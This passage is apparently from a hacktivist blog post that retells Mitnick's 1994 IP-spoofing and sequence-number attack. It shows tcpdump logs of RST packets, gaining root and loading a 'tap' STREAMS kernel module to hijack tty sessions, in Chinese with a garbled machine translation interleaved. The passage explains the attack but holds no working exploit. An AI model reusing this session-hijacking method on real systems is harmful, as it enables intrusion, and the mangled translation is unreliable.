14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096 14:18:53.556753 130.92.6.97.620> server.login: R 1382726980:1382726980 (0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096 14:18:53.616954 130.92.6.97.621> server.login: R 1382726981:1382726981 (0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096 14:18:53.676828 130.92.6.97.622> server.login: R 1382726982:1382726982 (0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096 14:18:53.736734 130.92.6.97.623> server.login: R 1382726983:1382726983 (0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096 14:18:53.796732 130.92.6.97.624> server.login: R 1382726984:1382726984 (0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096 14:18:53.867543 130.92.6.97.625> server.login: R 1382726985:1382726985 (0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096 14:18:53.917466 130.92.6.97.626> server.login: R 1382726986:1382726986 (0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096 14:18:53.976769 130.92.6.97.627> server.login: R 1382726987:1382726987 (0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096 14:18:54.039039 130.92.6.97.628> server.login: R 1382726988:1382726988 (0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096 14:18:54.097093 130.92.6.97.629> server.login: R 1382726989:1382726989 (0) win 4096

server.login 又可以接受连接请求了. server.login they can accept the connection request.

通过IP地址spoofing 成果获得root权限后,一个叫做"tap-2.01"的内核模块被x-terminal Results by IP address spoofing to gain root privileges, called "tap-2.01" kernel module is x-terminal
编译和安装: Compile and install:

x-terminal% modstat x-terminal% modstat
Id Type Loadaddr Size B-major C-major Sysnum Mod Name Id Type Loadaddr Size B-major C-major Sysnum Mod Name
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha 1 Pdrv ff050000 1000 59. Tap/tap-2.01 alpha

x-terminal% ls -l /dev/tap x-terminal% ls-l / dev / tap
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap crwxrwxrwx 1 root 37, 59 Dec 25 14:40 / dev / tap

这是一个出现内核STREAMS 模块，可以防到已有的STREAMS 堆栈和控制tty device 上面的用户. There is a kernel STREAMS module, can prevent the existing STREAMS stack and control the tty device above the user.

Hacktivis Anonymous From Indonesia

Pages

Jumat, 11 November 2011

Mitnick是怎样利用IP 序列攻击的 Mitnick is how to use the IP sequence attack

Tidak ada komentar:

Posting Komentar